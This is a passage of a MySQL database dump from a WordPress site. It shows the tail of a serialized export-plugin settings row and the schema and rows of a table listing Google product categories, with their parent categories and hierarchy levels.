tmp_unique_key\";s:7:\"{id[1]}\";s:17:\"single_product_id\";s:7:\"{id[1]}\";s:5:\"title\";s:10:\"{title[1]}\";s:36:\"single_product_id_first_is_variation\";s:10:\"{title[1]}\";s:7:\"content\";s:12:\"{content[1]}\";s:12:\"post_excerpt\";s:12:\"{excerpt[1]}\";s:10:\"tax_assing\";a:1:{s:16:\"dt_team_category\";i:1;}s:9:\"tax_logic\";a:1:{s:16:\"dt_team_category\";s:12:\"hierarchical\";}s:29:\"tax_hierarchical_logic_entire\";a:1:{s:16:\"dt_team_category\";i:1;}s:20:\"multiple_term_assing\";a:1:{s:16:\"dt_team_category\";i:1;}s:22:\"tax_hierarchical_delim\";a:1:{s:16:\"dt_team_category\";s:1:\">\";}s:31:\"is_tax_hierarchical_group_delim\";a:1:{s:16:\"dt_team_category\";i:1;}s:28:\"tax_hierarchical_group_delim\";a:1:{s:16:\"dt_team_category\";s:1:\"|\";}s:22:\"tax_hierarchical_xpath\";a:1:{s:16:\"dt_team_category\";a:1:{i:0;s:19:\"{teamcategories[1]}\";}}s:19:\"update_images_logic\";s:7:\"add_new\";s:23:\"download_featured_delim\";s:1:\"|\";s:23:\"download_featured_image\";s:8:\"{url[1]}\";s:16:\"required_add_ons\";a:0:{}s:9:\"delimiter\";s:1:\",\";s:12:\"root_element\";s:4:\"node\";}}}','','2023-08-31 06:22:25','Team Export - 2023 August 31 06:13',170,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','2023-08-31 06:22:25',0,0,0,2,'','2023-08-31 06:13:52');
/*!40000 ALTER TABLE `dnctiavkr_pmxe_exports` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_pmxe_google_cats`
--

DROP TABLE IF EXISTS `dnctiavkr_pmxe_google_cats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_pmxe_google_cats` (
  `id` int(11) NOT NULL,
  `name` varchar(200) NOT NULL,
  `parent_id` int(11) NOT NULL,
  `parent_name` varchar(200) NOT NULL,
  `level` tinyint(4) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_pmxe_google_cats`
--

LOCK TABLES `dnctiavkr_pmxe_google_cats` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_pmxe_google_cats` DISABLE KEYS */;
INSERT INTO `dnctiavkr_pmxe_google_cats` VALUES
(1,'Animals & Pet Supplies',0,'',0),
(2,'Pet Supplies',1,'Animals & Pet Supplies',1),
(3,'Bird Supplies',2,'Pet Supplies',2),
(4,'Cat Supplies',2,'Pet Supplies',2),
(5,'Dog Supplies',2,'Pet Supplies',2),
(6,'Fish Supplies',2,'Pet Supplies',2),
(7,'Reptile & Amphibian Supplies',2,'Pet Supplies',2),
(8,'Arts & Entertainment',0,'',0),
(9,'Artwork',696,'Decor',2),
(11,'Sculptures & Statues',9,'Artwork',3),
(16,'Arts & Crafts',5710,'Hobbies & Creative Arts',2),
(18,'Art Brushes',505392,'Craft Measuring & Marking Tools',5),
(24,'Art & Craft Paper',505372,'Art & Crafting Materials',4),
(32,'Beads',505379,'Embellishments & Trims',5),
(33,'Juggling',5710,'Hobbies & Creative Arts',2),
(35,'Magic & Novelties',5710,'Hobbies & Creative Arts',2),
(36,'Craft Magnets',505376,'Crafting Adhesives & Magnets',5),
(37,'Scale Models',216,'Collectibles',3),
(39,'Photography',141,'Cameras & Optics',1),
(40,'Photo Albums',4360,'Photo Storage',4),
(41,'Darkroom',39,'Photography',2),
(42,'Lighting & Studio',39,'Photography',2),
(44,'Pottery & Sculpting Materials',505372,'Art & Crafting Materials',4),
(47,'Fabric',505384,'Textiles',5),
(49,'Thread & Floss',505382,'Crafting Fibers',5),
(53,'Gift Cards & Certificates',2559,'Gift Giving',3),
(54,'Musical Instruments',5710,'Hobbies & Creative Arts',2),
(55,'Musical Instrument & Orchestra Accessories',5710,'Hobbies & Creative Arts',2),
(56,'Musical Instrument Amplifiers',55,'Musical Instrument & Orchestra Accessories',3),
(57,'Brass Instrument Accessories',55,'Musical Instrument & Orchestra Accessories',3),
(59,'Drum Sticks & Brushes',3465,'Percussion Accessories',4),
(60,'Musical Keyboard Accessories',55,'Musical Instrument & Orchestra Accessories',3),
(61,'String Instrument Accessories',55,'Musical Instrument & Orchestra Accessories',3),
(62,'Woodwind Instrument Accessories',55,'Musical Instrument & Orchestra Accessories',3),
(63,'Brass Instruments',54,'Musical Instruments',3),
(65,'Euphoniums',63,'Brass Instruments',4),
(67,'French Horns',63,'Brass Instruments',4),
(70,'Trombones',63,'Brass Instruments',4),
(72,'Tubas',63,'Brass Instruments',4),
(74,'Musical Keyboards',6001,'Electronic Musical Instruments',4),
(75,'Percussion',54,'Musical Instruments',3),
(76,'Pianos',54,'Musical Instruments',3),
(77,'String Instruments',54,'Musical Instruments',3),
(78,'Upright Basses',77,'String Instruments',4),
(79,'Cellos',77,'String Instruments',4),
(80,'Guitars',77,'String Instruments',4),
(84,'Harps',77,'String Instruments',4),
(85,'Violas',77,'String Instruments',4),
(86,'Violins',77,'String Instruments',4),
(87,'Woodwinds',54,'Musical Instruments',3),
(88,'Clarinets',87,'Woodwinds',4),
(89,'Flutes',87,'Woodwinds',4),
(90,'Recorders',87,'Woodwinds',4),
(91,'Saxophones',87,'Woodwinds',4),
(93,'Bookmarks',6174,'Book Accessories',2),
(94,'Gift Wrapping',2559,'Gift Giving',3),
(95,'Greeting & Note Cards',2559,'Gift Giving',3),
(96,'Party Supplies',5709,'Party & Celebration',2),
(97,'Religious Items',5605,'Religious & Ceremonial',1),
(100,'Backpacks',5181,'Luggage & Bags',1),
(101,'Briefcases',5181,'Luggage & Bags',1),
(103,'Duffel Bags',5181,'Luggage & Bags',1),
(104,'Fanny Packs',5181,'Luggage & Bags',1),
(105,'Garment Bags',5181,'Luggage & Bags',1),
(106,'Messenger Bags',5181,'Luggage & Bags',1),
(107,'Suitcases',5181,'Luggage & Bags',1),
(108,'Cosmetic & Toiletry Bags',5181,'Luggage & Bags',1),
(110,'Luggage Accessories',5181,'Luggage & Bags',1),
(111,'Business & Industrial',0,'',0),
(112,'Agriculture',111,'Business & Industrial',1),
(113,'Fertilizers',2962,'Gardening',3),
(114,'Construction',111,'Business & Industrial',1),
(115,'Building Materials',632,'Hardware',1),
(119,'Doors',115,'Building Materials',2),
(120,'Glass',115,'Building Materials',2),
(121,'Gutters',123,'Roofing',3),
(122,'Insulation',115,'Building Materials',2),
(123,'Roofing',115,'Building Materials',2),
(124,'Windows',115,'Building Materials',2),
(125,'Lumber & Sheet Stock',115,'Building Materials',2),
(126,'Dollies & Hand Trucks',1167,'Tools',2),
(127,'Power & Electrical Supplies',632,'Hardware',1),
(128,'Fencing & Barriers',632,'Hardware',1),
(130,'Ladders & Scaffolding',1167,'Tools',2),
(131,'Lifts & Hoists',6987,'Material Handling',2),
(133,'Plumbing',632,'Hardware',1),
(134,'Surveying',114,'Construction',2),
(135,'Food Service',111,'Business & Industrial',1),
(136,'Food Gift Baskets',422,'Food Items',2),
(137,'Vending Machines',135,'Food Service',2),
(138,'Retail',111,'Business & Industrial',1),
(139,'Barcode Scanners',1928,'Input Devices',4),
(141,'Cameras & Optics',0,'',0),
(142,'Cameras',141,'Cameras & Optics',1),
(143,'Camera Parts & Accessories',2096,'Camera & Optic Accessories',2),
(146,'Memory Card Adapters',258,'Adapters',3),
(147,'Lens Filters',2911,'Camera Lens Accessories',3),
(148,'Camera Flashes',143,'Camera Parts & Accessories',3),
(149,'Camera & Video Camera Lenses',2096,'Camera & Optic Accessories',2),
(150,'Tripods & Monopods',2096,'Camera & Optic Accessories',2),
(152,'Digital Cameras',142,'Cameras',2),
(153,'Camera Film',143,'Camera Parts & Accessories',3),
(154,'Film Cameras',142,'Cameras',2),
(155,'Video Cameras',142,'Cameras',2),
(156,'Optics',141,'Cameras & Optics',1),
(157,'Binoculars',156,'Optics',2),
(158,'Microscopes',4335,'Laboratory Equipment',3),
(160,'Optic Accessories',2096,'Camera & Optic Accessories',2),
(161,'Rangefinders',156,'Optics',2),
(165,'Telescopes',4040,'Scopes',3),
(166,'Apparel & Accessories',0,'',0),
(167,'Clothing Accessories',166,'Apparel & Accessories',1),
(168,'Bandanas & Headties',167,'Clothing Accessories',2),
(169,'Belts',167,'Clothing Accessories',2),
(170,'Gloves & Mittens',167,'Clothing Accessories',2),
(171,'Hair Accessories',167,'Clothing Accessories',2),
(173,'Hats',167,'Clothing Accessories',2),
(175,'Keychains',6552,'Handbag & Wallet Accessories',2),
(176,'Neckties',167,'Clothing Accessories',2),
(177,'Scarves & Shawls',167,'Clothing Accessories',2),
(178,'Sunglasses',167,'Clothing Accessories',2),
(179,'Suspenders',167,'Clothing Accessories',2),
(180,'Tie Clips',167,'Clothing Accessories',2),
(181,'Wigs',171,'Hair Accessories',3),
(182,'Baby & Toddler Clothing',1604,'Clothing',2),
(184,'Costumes & Accessories',166,'Apparel & Accessories',1),
(187,'Shoes',166,'Apparel & Accessories',1),
(188,'Jewelry',166,'Apparel & Accessories',1),
(189,'Anklets',188,'Jewelry',2),
(190,'Body Jewelry',188,'Jewelry',2),
(191,'Bracelets',188,'Jewelry',2),
(192,'Charms & Pendants',188,'Jewelry',2),
(193,'Cufflinks',167,'Clothing Accessories',2),
(194,'Earrings',188,'Jewelry',2),
(196,'Necklaces',188,'Jewelry',2),
(197,'Brooches & Lapel Pins',188,'Jewelry',2),
(198,'Loose Stones',505379,'Embellishments & Trims',5),
(200,'Rings',188,'Jewelry',2),
(201,'Watches',188,'Jewelry',2),
(203,'Outerwear',1604,'Clothing',2),
(204,'Pants',1604,'Clothing',2),
(206,'School Uniforms',2306,'Uniforms',3),
(207,'Shorts',1604,'Clothing',2),
(208,'Sleepwear & Loungewear',1604,'Clothing',2),
(209,'Socks',213,'Underwear & Socks',3),
(211,'Swimwear',1604,'Clothing',2),
(212,'Shirts & Tops',1604,'Clothing',2),
(213,'Underwear & Socks',1604,'Clothing',2),
(214,'Bras',213,'Underwear & Socks',3),
(215,'Hosiery',213,'Underwear & Socks',3),
(216,'Collectibles',5710,'Hobbies & Creative Arts',2),
(217,'Collectible Coins & Currency',216,'Collectibles',3),
(218,'Rocks & Fossils',216,'Collectibles',3),
(219,'Postage Stamps',216,'Collectibles',3),
(220,'Collectible Weapons',216,'Collectibles',3),
(221,'Collectible Swords',220,'Collectible Weapons',4),
(222,'Electronics',0,'',0),
(223,'Audio',222,'Electronics',1),
(224,'Audio Amplifiers',2165,'Audio Components',3),
(225,'Boomboxes',242,'Audio Players & Recorders',3),
(226,'CD Players & Recorders',242,'Audio Players & Recorders',3),
(230,'Karaoke Systems',242,'Audio Players & Recorders',3),
(232,'MP3 Player Accessories',1420,'Audio Accessories',3),
(233,'MP3 Players',242,'Audio Players & Recorders',3),
(234,'Microphones',2165,'Audio Components',3),
(235,'MiniDisc Players & Recorders',242,'Audio Players & Recorders',3),
(236,'Audio Mixers',2165,'Audio Components',3),
(239,'Satellite Radio Accessories',1420,'Audio Accessories',3),
(241,'Audio & Video Receivers',2165,'Audio Components',3),
(242,'Audio Players & Recorders',223,'Audio',2),
(243,'Cassette Players & Recorders',242,'Audio Players & Recorders',3),
(244,'Voice Recorders',242,'Audio Players & Recorders',3),
(245,'Audio Samplers',6001,'Electronic Musical Instruments',4),
(246,'Signal Processors',2165,'Audio Components',3),
(247,'Effects Processors',246,'Signal Processors',4),
(248,'Equalizers',246,'Signal Processors',4),
(249,'Speakers',2165,'Audio Components',3),
(251,'Stereo Systems',242,'Audio Players & Recorders',3),
(252,'Home Theater Systems',242,'Audio Players & Recorders',3),
(256,'Turntables & Record Players',242,'Audio Players & Recorders',3),
(258,'Adapters',2082,'Electronics Accessories',2),
(259,'Cables',2082,'Electronics Accessories',2),
(262,'Communications',222,'Electronics',1),
(263,'Communication Radio Accessories',262,'Communications',2),
(264,'Mobile Phone Accessories',270,'Telephony',3),
(265,'Telephone Accessories',270,'Telephony',3),
(266,'Answering Machines',262,'Communications',2),
(267,'Mobile Phones',270,'Telephony',3),
(268,'Pagers',262,'Communications',2),
(269,'Phone Cards',265,'Telephone Accessories',4),
(270,'Telephony',262,'Communications',2),
(271,'Corded Phones',270,'Telephony',3),
(272,'Cordless Phones',270,'Telephony',3),
(273,'Two',2471,'Communication Radios',3),
(274,'Video Conferencing',262,'Communications',2),
(275,'Power',2082,'Electronics Accessories',2),
(276,'Batteries',275,'Power',3),
(278,'Computers',222,'Electronics',1),
(279,'Computer Accessories',2082,'Electronics Accessories',2),
(280,'Handheld Device Accessories',279,'Computer Accessories',3),
(283,'Computer Monitor Accessories',2027,'Video Accessories',3),
(284,'Scanner Accessories',345,'Print, Copy, Scan & Fax',2),
(285,'Computer Components',2082,'Electronics Accessories',2),
(286,'Audio Cards & Adapters',287,'I/O Cards & Adapters',4),
(287,'I/O Cards & Adapters',285,'Computer Components',3),
(288,'Memory',2082,'Electronics Accessories',2),
(289,'Motherboards',499898,'Computer Circuit Boards',4),
(290,'Network Cards & Adapters',342,'Networking',2),
(291,'Computer Power Supplies',285,'Computer Components',3),
(292,'Computer Processors',285,'Computer Components',3),
(293,'Computer Racks & Mounts',285,'Computer Components',3),
(294,'Computer Starter Kits',285,'Computer Components',3),
(295,'Computer System Cooling Parts',285,'Computer Components',3),
(296,'Desktop Computer & Server Cases',285,'Computer Components',3),
(297,'Video Cards & Adapters',287,'I/O Cards & Adapters',4),
(298,'Handheld Devices',278,'Computers',2),
(300,'Laptop Docking Stations',279,'Computer Accessories',3),
(301,'Game Controllers',1928,'Input Devices',4),
(302,'Graphics Tablets',1928,'Input Devices',4),
(303,'Keyboards',1928,'Input Devices',4),
(304,'Mice & Trackballs',1928,'Input Devices',4),
(305,'Computer Monitors',386,'Video',2),
(306,'Scanners',345,'Print, Copy, Scan & Fax',2),
(308,'Touchpads',1928,'Input Devices',4),
(311,'USB & FireWire Hubs',285,'Computer Components',3),
(312,'Webcams',142,'Cameras',2),
(313,'Computer Software',2092,'Software',1),
(315,'Compilers & Programming Tools',313,'Computer Software',2),
(317,'Educational Software',313,'Computer Software',2),
(318,'Handheld & PDA Software',313,'Computer Software',2),
(319,'Multimedia & Design Software',313,'Computer Software',2),
(321,'Operating Systems',313,'Computer Software',2),
(325,'Desktop Computers',278,'Computers',2),
(328,'Laptops',278,'Computers',2),
(331,'Computer Servers',278,'Computers',2),
(333,'Calculators',950,'Office Equipment',2),
(337,'Electronic Dictionaries & Translators',950,'Office Equipment',2),
(338,'Flashlights & Headlamps',1167,'Tools',2),
(339,'GPS Navigation Systems',222,'Electronics',1),
(340,'Marine Electronics',222,'Electronics',1),
(341,'Remote Controls',2082,'Electronics Accessories',2),
(342,'Networking',222,'Electronics',1),
(343,'Modems',342,'Networking',2),
(345,'Print, Copy, Scan & Fax',222,'Electronics',1),
(356,'Toner & Inkjet Cartridges',5258,'Printer Consumables',4),
(359,'Business & Home Security',536,'Home & Garden',1),
(360,'Intercoms',262,'Communications',2),
(361,'Metal Detectors',1556,'Law Enforcement',2),
(362,'Surveillance Cameras',142,'Cameras',2),
(363,'Security Lights',359,'Business & Home Security',2),
(364,'Security Monitors & Recorders',359,'Business & Home Security',2),
(365,'Security System Sensors',359,'Business & Home Security',2),
(367,'Blank Media',2082,'Electronics Accessories',2),
(376,'CD/DVD Duplicators',5268,'Disk Duplicators',5),
(377,'Optical Drives',2414,'Storage Devices',4),
(380,'Hard Drives',2414,'Storage Devices',4),
(381,'Hard Drive Carrying Cases',1623,'Hard Drive Accessories',5),
(384,'Flash Memory',288,'Memory',3),
(385,'Tape Drives',2414,'Storage Devices',4),
(386,'Video',222,'Electronics',1),
(387,'Video Players & Recorders',386,'Video',2),
(388,'DVD & Blu',387,'Video Players & Recorders',3),
(389,'DVD Recorders',387,'Video Players & Recorders',3),
(390,'Digital Video Recorders',387,'Video Players & Recorders',3),
(391,'VCRs',387,'Video Players & Recorders',3),
(393,'Projector Accessories',2027,'Video Accessories',3),
(394,'Projector Replacement Lamps',393,'Projector Accessories',4),
(395,'Projection Screens',393,'Projector Accessories',4),
(396,'Projectors',386,'Video',2),
(397,'Multimedia Projectors',396,'Projectors',3),
(398,'Overhead Projectors',396,'Projectors',3),
(399,'Slide Projectors',396,'Projectors',3),
(401,'Satellite Receivers',5561,'Satellite & Cable TV',3),
(403,'Television Parts & Accessories',2027,'Video Accessories',3),
(404,'Televisions',386,'Video',2),
(408,'Special Effects',5709,'Party & Celebration',2),
(409,'Fog Machines',408,'Special Effects',3),
(410,'Special Effects Lighting',408,'Special Effects',3),
(412,'Food, Beverages & Tobacco',0,'',0),
(413,'Beverages',412,'Food, Beverages & Tobacco',1),
(414,'Beer',499676,'Alcoholic Beverages',3),
(415,'Hot Chocolate',413,'Beverages',2),
(417,'Liquor & Spirits',499676,'Alcoholic Beverages',3),
(418,'Milk',413,'Beverages',2),
(420,'Water',413,'Beverages',2),
(421,'Wine',499676,'Alcoholic Beverages',3),
(422,'Food Items',412,'Food, Beverages & Tobacco',1),
(423,'Snack Foods',422,'Food Items',2),
(424,'Breads & Buns',1876,'Bakery',3),
(427,'Condiments & Sauces',422,'Food Items',2),
(428,'Dairy Products',422,'Food Items',2),
(429,'Cheese',428,'Dairy Products',3),
(430,'Fruits & Vegetables',422,'Food Items',2),
(431,'Grains, Rice & Cereal',422,'Food Items',2),
(432,'Meat, Seafood & Eggs',422,'Food Items',2),
(433,'Nuts & Seeds',422,'Food Items',2),
(434,'Pasta & Noodles',422,'Food Items',2),
(435,'Tobacco Products',412,'Food, Beverages & Tobacco',1),
(436,'Furniture',0,'',0),
(438,'Bean Bag Chairs',443,'Chairs',2),
(441,'Benches',436,'Furniture',1),
(442,'Carts & Islands',436,'Furniture',1),
(443,'Chairs',436,'Furniture',1),
(447,'Buffets & Sideboards',6356,'Cabinets & Storage',2),
(448,'China Cabinets & Hutches',6356,'Cabinets & Storage',2),
(450,'Futons',436,'Furniture',1),
(451,'Headboards & Footboards',6433,'Beds & Accessories',2),
(453,'Kitchen & Dining Carts',442,'Carts & Islands',2),
(456,'Chaises',443,'Chairs',2),
(457,'Entertainment Centers & TV Stands',436,'Furniture',1),
(458,'Ottomans',436,'Furniture',1),
(460,'Sofas',436,'Furniture',1),
(462,'Nightstands',6392,'Tables',2),
(463,'File Cabinets',6356,'Cabinets & Storage',2),
(464,'Shelving',436,'Furniture',1),
(465,'Bookcases & Standing Shelves',464,'Shelving',2),
(469,'Health & Beauty',0,'',0),
(471,'Massagers',5663,'Massage & Relaxation',3),
(472,'Tanning Beds',2915,'Personal Care',2),
(473,'Cosmetics',2915,'Personal Care',2),
(474,'Bath & Body',473,'Cosmetics',3),
(475,'Bath & Body Gift Sets',473,'Cosmetics',3),
(476,'Face Mirrors',2548,'Makeup Tools',5),
(477,'Makeup',473,'Cosmetics',3),
(478,'Nail Care',473,'Cosmetics',3),
(479,'Perfume & Cologne',473,'Cosmetics',3),
(481,'Acne Treatments & Kits',567,'Skin Care',4),
(482,'Lip Balms & Treatments',567,'Skin Care',4),
(484,'Deodorant & Anti',2915,'Personal Care',2),
(485,'Feminine Sanitary Supplies',2915,'Personal Care',2),
(486,'Hair Care',2915,'Personal Care',2),
(487,'Combs & Brushes',6019,'Hair Styling Tools',4),
(488,'Hair Curlers',6019,'Hair Styling Tools',4),
(489,'Curling Irons',6019,'Hair Styling Tools',4),
(490,'Hair Dryers',6019,'Hair Styling Tools',4),
(491,'Health Care',469,'Health & Beauty',1),
(493,'Back Care',2915,'Personal Care',2),
(494,'Biometric Monitors',491,'Health Care',2),
(495,'Blood Pressure Monitors',494,'Biometric Monitors',3),
(496,'Body Fat Analyzers',494,'Biometric Monitors',3),
(497,'Cholesterol Analyzers',494,'Biometric Monitors',3),
(500,'Body Weight Scales',494,'Biometric Monitors',3),
(501,'Medical Thermometers',494,'Biometric Monitors',3),
(506,'Ear Care',2915,'Personal Care',2),
(508,'First Aid',491,'Health Care',2),
(509,'Medical Tape & Bandages',508,'First Aid',3),
(510,'First Aid Kits',508,'First Aid',3),
(511,'Disposable Gloves',2907,'Medical Supplies',3),
(512,'Household Insect Repellents',2865,'Repellents',4),
(513,'Medical Masks',503724,'Protective Masks',3),
(515,'Foot Care',2915,'Personal Care',2),
(516,'Hot & Cold Therapies',508,'First Aid',3),
(517,'Incontinence Aids',491,'Health Care',2),
(518,'Medicine & Drugs',491,'Health Care',2),
(519,'Mobility & Accessibility',491,'Health Care',2),
(520,'Accessibility Equipment',519,'Mobility & Accessibility',3),
(521,'Accessibility Equipment Accessories',519,'Mobility & Accessibility',3),
(523,'Supports & Braces',491,'Health Care',2),
(524,'Eyeglasses',1380,'Vision Care',3),
(525,'Vitamins & Supplements',2890,'Fitness & Nutrition',3),
(526,'Oral Care',2915,'Personal Care',2),
(527,'Toothbrushes',526,'Oral Care',3),
(528,'Shaving & Grooming',2915,'Personal Care',2),
(529,'Aftershave',528,'Shaving & Grooming',3),
(531,'Electric Razor Accessories',528,'Shaving & Grooming',3),
(532,'Electric Razors',528,'Shaving & Grooming',3),
(533,'Hair Clippers & Trimmers',528,'Shaving & Grooming',3),
(534,'Razors & Razor Blades',528,'Shaving & Grooming',3),
(536,'Home & Garden',0,'',0),
(537,'Baby & Toddler',0,'',0),
(538,'Baby Carriers',2764,'Baby Transport',2),
(539,'Play Yards',2847,'Baby Toys & Activity Equipment',2),
(540,'Baby Safety',537,'Baby & Toddler',1),
(541,'Baby Monitors',540,'Baby Safety',2),
(542,'Baby & Pet Gates',540,'Baby Safety',2),
(543,'Baby Safety Locks & Guards',540,'Baby Safety',2),
(544,'Baby Safety Rails',540,'Baby Safety',2),
(547,'Baby & Toddler Car Seats',2764,'Baby Transport',2),
(548,'Diapering',537,'Baby & Toddler',1),
(549,'Diaper Bags',5181,'Luggage & Bags',1),
(550,'Diaper Pails',548,'Diapering',2),
(551,'Diapers',548,'Diapering',2),
(552,'Potty Seats',6952,'Potty Training',2),
(553,'Baby Wipes',548,'Diapering',2),
(554,'Baby & Toddler Furniture',436,'Furniture',1),
(555,'Baby Bouncers & Rockers',2847,'Baby Toys & Activity Equipment',2),
(558,'Changing Tables',554,'Baby & Toddler Furniture',2),
(559,'High Chairs & Booster Seats',554,'Baby & Toddler Furniture',2),
(560,'Baby Jumpers & Swings',2847,'Baby Toys & Activity Equipment',2),
(561,'Nursing & Feeding',537,'Baby & Toddler',1),
(562,'Baby & Toddler Food',561,'Nursing & Feeding',2),
(563,'Baby Formula',562,'Baby & Toddler Food',3),
(564,'Baby Bottles',561,'Nursing & Feeding',2),
(565,'Breast Pumps',561,'Nursing & Feeding',2),
(566,'Pacifiers & Teethers',5252,'Baby Health',2),
(567,'Skin Care',473,'Cosmetics',3),
(568,'Baby Strollers',2764,'Baby Transport',2),
(569,'Bedding',4171,'Linens & Bedding',2),
(572,'Address Signs',696,'Decor',2),
(573,'Baskets',696,'Decor',2),
(574,'Bathroom Accessories',536,'Home & Garden',1),
(575,'Bath Caddies',574,'Bathroom Accessories',2),
(576,'Bath Towels & Washcloths',4077,'Towels',3),
(577,'Bath Mats & Rugs',574,'Bathroom Accessories',2),
(578,'Shower Curtain Rings',574,'Bathroom Accessories',2),
(579,'Facial Tissue Holders',574,'Bathroom Accessories',2),
(580,'Shower Curtains',574,'Bathroom Accessories',2),
(581,'Shower Heads',2206,'Shower Parts',4),
(582,'Soap Dishes & Holders',574,'Bathroom Accessories',2),
(583,'Toilet Brushes & Holders',574,'Bathroom Accessories',2),
(584,'Toilet Paper Holders',574,'Bathroom Accessories',2),
(585,'Toothbrush Holders',574,'Bathroom Accessories',2),
(586,'Towel Racks & Holders',574,'Bathroom Accessories',2),
(587,'Bookends',696,'Decor',2),
(588,'Candles',592,'Home Fragrances',3),
(592,'Home Fragrances',696,'Decor',2),
(594,'Lighting',536,'Home & Garden',1),
(595,'Mirrors',696,'Decor',2),
(596,'Seasonal & Holiday Decorations',696,'Decor',2),
(597,'Picture Frames',696,'Decor',2),
(598,'Rugs',696,'Decor',2),
(599,'Slipcovers',696,'Decor',2),
(600,'Smoking Accessories',536,'Home & Garden',1),
(601,'Table Linens',4171,'Linens & Bedding',2),
(602,'Vases',696,'Decor',2),
(603,'Window Treatments',696,'Decor',2),
(604,'Household Appliances',536,'Home & Garden',1),
(605,'Air Conditioners',1626,'Climate Control Appliances',3),
(606,'Air Purifiers',1626,'Climate Control Appliances',3),
(607,'Dehumidifiers',1626,'Climate Control Appliances',3),
(608,'Fans',1626,'Climate Control Appliances',3),
(609,'Garage Door Openers',604,'Household Appliances',2),
(610,'Garbage Disposals',730,'Kitchen Appliances',3),
(611,'Space Heaters',1626,'Climate Control Appliances',3),
(613,'Humidifiers',1626,'Climate Control Appliances',3),
(615,'Sewing Machines',505388,'Textile Craft Machines',5),
(616,'Floor & Steam Cleaners',604,'Household Appliances',2),
(618,'Vacuum Accessories',3348,'Household Appliance Accessories',2),
(619,'Vacuums',604,'Household Appliances',2),
(621,'Water Heaters',604,'Household Appliances',2),
(623,'Household Cleaning Supplies',630,'Household Supplies',2),
(624,'Facial Tissues',2530,'Household Paper Products',3),
(625,'Firewood & Fuel',2862,'Fireplace & Wood Stove Accessories',2),
(627,'Laundry Supplies',630,'Household Supplies',2),
(628,'Shoe Care & Tools',630,'Household Supplies',2),
(629,'Toilet Paper',2530,'Household Paper Products',3),
(630,'Household Supplies',536,'Home & Garden',1),
(631,'Hangers',5558,'Clothing & Closet Storage',4),
(632,'Hardware',0,'',0),
(633,'Ironing Boards',627,'Laundry Supplies',3),
(634,'Laundry Baskets',627,'Laundry Supplies',3),
(635,'Step Stools',130,'Ladders & Scaffolding',3),
(636,'Storage & Organization',630,'Household Supplies',2),
(637,'Trash Cans & Wastebaskets',4516,'Waste Containment',3),
(638,'Kitchen & Dining',536,'Home & Garden',1),
(639,'Aprons',668,'Kitchen Tools & Utensils',3),
(640,'Bakeware',6070,'Cookware & Bakeware',3),
(641,'Baking & Cookie Sheets',640,'Bakeware',4),
(642,'Bread Pans & Molds',640,'Bakeware',4),
(643,'Cake Pans & Molds',640,'Bakeware',4),
(644,'Muffin & Pastry Pans',640,'Bakeware',4),
(645,'Pie & Quiche Pans',640,'Bakeware',4),
(646,'Pizza Stones',640,'Bakeware',4),
(647,'Ramekins & Souffle Dishes',640,'Bakeware',4),
(648,'Roasting Pans',640,'Bakeware',4),
(649,'Barware',638,'Kitchen & Dining',2),
(650,'Decanters',649,'Barware',3),
(651,'Cocktail Shakers & Tools',649,'Barware',3),
(652,'Coffee Servers & Tea Pots',672,'Tableware',3),
(653,'Colanders & Strainers',668,'Kitchen Tools & Utensils',3),
(654,'Cookware',6070,'Cookware & Bakeware',3),
(655,'Casserole Dishes',654,'Cookware',4),
(656,'Double Boilers',654,'Cookware',4),
(657,'Dutch Ovens',654,'Cookware',4),
(658,'Griddles & Grill Pans',654,'Cookware',4),
(659,'Stovetop Kettles',654,'Cookware',4),
(660,'Pressure Cookers & Canners',654,'Cookware',4),
(661,'Saucepans',654,'Cookware',4),
(662,'Skillets & Frying Pans',654,'Cookware',4),
(663,'Stock Pots',654,'Cookware',4),
(664,'Woks',654,'Cookware',4),
(665,'Kitchen Knives',668,'Kitchen Tools & Utensils',3),
(666,'Cutting Boards',668,'Kitchen Tools & Utensils',3),
(667,'Food Storage Containers',2626,'Food Storage',3),
(668,'Kitchen Tools & Utensils',638,'Kitchen & Dining',2),
(669,'Lunch Boxes & Totes',2920,'Food & Beverage Carriers',3),
(670,'Oven Mitts & Pot Holders',668,'Kitchen Tools & Utensils',3),
(671,'Picnic Baskets',2920,'Food & Beverage Carriers',3),
(672,'Tableware',638,'Kitchen & Dining',2),
(673,'Dinnerware',672,'Tableware',3),
(674,'Drinkware',672,'Tableware',3),
(675,'Flatware',672,'Tableware',3),
(676,'Salt & Pepper Shakers',672,'Tableware',3),
(677,'Trivets',672,'Tableware',3),
(679,'Cooktops',730,'Kitchen Appliances',3),
(680,'Dishwashers',730,'Kitchen Appliances',3),
(681,'Freezers',730,'Kitchen Appliances',3),
(683,'Ovens',730,'Kitchen Appliances',3),
(684,'Range Hoods',730,'Kitchen Appliances',3),
(685,'Ranges',730,'Kitchen Appliances',3),
(686,'Refrigerators',730,'Kitchen Appliances',3),
(687,'Food Smokers',730,'Kitchen Appliances',3),
(688,'Trash Compactors',730,'Kitchen Appliances',3),
(689,'Lawn & Garden',536,'Home & Garden',1),
(690,'Compost',4085,'Composting',4),
(691,'Disease Control',2962,'Gardening',3),
(693,'Greenhouses',2962,'Gardening',3),
(694,'Lawn Mowers',3798,'Outdoor Power Equipment',3),
(695,'Log Racks & Carriers',2862,'Fireplace & Wood Stove Accessories',2),
(696,'Decor',536,'Home & Garden',1),
(697,'Bird Baths',696,'Decor',2),
(698,'Bird Feeders',6993,'Bird & Wildlife Feeders',3),
(699,'Birdhouses',500078,'Bird & Wildlife Houses',3),
(700,'Garden Bridges',2613,'Outdoor Structures',4),
(701,'Flags & Windsocks',696,'Decor',2),
(702,'Fountains & Ponds',696,'Decor',2),
(703,'Garden Arches, Trellises, Arbors & Pergolas',2613,'Outdoor Structures',4),
(704,'Garden & Stepping Stones',696,'Decor',2),
(706,'Mailboxes',696,'Decor',2),
(708,'Decorative Plaques',696,'Decor',2),
(709,'Rain Chains',696,'Decor',2),
(710,'Rain Gauges',696,'Decor',2),
(711,'Sundials',696,'Decor',2),
(712,'Weather Vanes & Roof Decor',696,'Decor',2),
(714,'Wind Chimes',696,'Decor',2),
